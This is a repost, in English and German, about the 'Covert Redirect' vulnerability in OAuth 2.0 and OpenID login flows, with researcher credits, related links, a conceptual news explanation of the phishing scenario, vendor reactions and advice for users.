Covert Redirect is also related to single sign-on. It is known by its influence on OAuth and OpenID. Hacker may use it to steal users’ sensitive information. Almost all OAuth 2.0 and OpenID providers worldwide are affected. Covert Redirect can work together with CSRF (Cross-site Request Forgery) as well.



 

Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://tetraph.com/wangjing/

 

 

 

 

 

Related Articles:
http://tetraph.com/security/covert-redirect/linkedin-oauth-2-0-covert-redirect-vulnerability/
http://computerobsess.blogspot.com/2014/07/linkedin-service-exploit.html
https://twitter.com/tetraphibious/status/559169110106316800
https://webtechwire.wordpress.com/2014/06/07/linkedin-bugs/
http://securityrelated.blogspot.com/2014/07/linkedin-service-exploit.html
http://ithut.tumblr.com/post/119493922098/securitypost-itinfotech-continuan-los
http://tetraph.blog.163.com/blog/static/23460305120144385617661/
https://computertechhut.wordpress.com/2014/06/11/linkedin-bugs/
http://itsecurity.lofter.com/post/1cfbf9e7_70608ba
http://www.inzeed.com/kaleidoscope/covert-redirect/linkedin-oauth-2-0-covert-redirect-vulnerability/

 

Sicherheitslücke in OAuth 2.0 und OpenID gefunden

covert_redirect3

Wang Jing, Student an der Nanyang Technological University in Singapur, hat nach dem Bekanntwerden des OpenSSL-Heartbleed-Lecks, eine weitere schwere Sicherheitslücke entdeckt, diesmal in den Authentifizierungsmethoden OAuth 2.0 und OpenID. Die als “Covert Redirect” (“Heimliche Umleitung”) benannte Sicherheitslücke ermöglicht es Angreifern, dem Nutzer einen echt aussehenden Login-Screen unterzujubeln und sich so Zugriff auf die bereitgestellten Daten zu verschaffen. Das gefährliche daran: Die Sicherheitslücke besitzt – anders als bisher bekannte Fishing-Versuche – eine legitime Domainadresse, kann also über einen Blick in die URL-Zeile des Browsers nicht oder nur sehr schwer entlarvt werden. Auf OAuth 2.0 und OpenID bieten inzwischen zahlreiche Webdienste um einen direkten Login in andere Dienste und Apps zu ermöglichen, darunter auch Google, Facebook, Microsoft und Co.

 

So ist es möglich, dem Nutzer eine Mail mit einem speziell präparierten Link zukommen zu lassen, ein Klick auf diesen öffnet eben wie gesagt eine legitime Adresse samt entsprechendem Logo. Autorisiert der Nutzer dann diese Anfrage und loggt sich in den Dienst ein, so werden die Daten nicht an die vermeintliche App weitergeleitet, sondern gelangen eben in den Besitz des Angreifers. Je nachdem, welche Daten abfragt werden, bekommt dieser somit also E-Mail-Adresse, Geburtsdatum, Kontaktlisten und dergleichen. Ebenso ist es möglich, den Nutzer nach dem Login auf eine beliebige Webseite, welche unter Umständen Malware verbreitet, weiterzuleiten.



covert-redirect-11

 

covert-redirect-12


Die Lösung des Problems könnte aber – wenn es überhaupt einmal eine geben sollte – eine langwierige Sache sein. Wang Jing hat bereits etliche größere Anbieter der Loginmethoden angeschrieben und über die gefundene Sicherheitslücke aufgeklärt, hierbei gab es jedoch unterschiedliche Aussagen. Im Hause Google beobachtet man das Problem, Microsoft ist sich keiner Schuld bewusst und schiebt die Sicherheitslücke an Drittanbieter ab. Lediglich Facebook scheint hier ehrlich zu sein und gibt an, dass es sich dabei um ein grundsätzliches Problem von OAuth 2.0 und OpenID handelt – möchte man nicht eine umfangreiche Whitelist mit sämtlichen nicht-schädlichen Apps pflegen, ist die Sicherheitslücke nicht “mal eben so” zu beheben. Im Grunde dürften sich sämtliche Gegenmaßnahmen negativ auf die Nutzererfahrung auswirken, was natürlich keiner der Dienste in Kauf nehmen möchte – und so bleibt es hierbei scheinbar beim “kleineren Übel” für die Anbieter.

So bleibt eigentlich nur die Möglichkeit, auf OAuth 2.0 oder OpenID als Login-Methode für Drittanbieter Dienste und Apps zu verzichten oder genauestens darauf zu achten, auf was man klickt. Hat man keine explizite Autorisierung angestoßen, sollte man die geöffneten Tabs umgehend schließen und darauf hoffen, dass sich nicht doch irgendwo ein falscher Link eingepfercht hat.



Quelle:
http://www.blogtogo.de/sicherheitsluecke-in-oauth-2-0-und-openid-gefunden/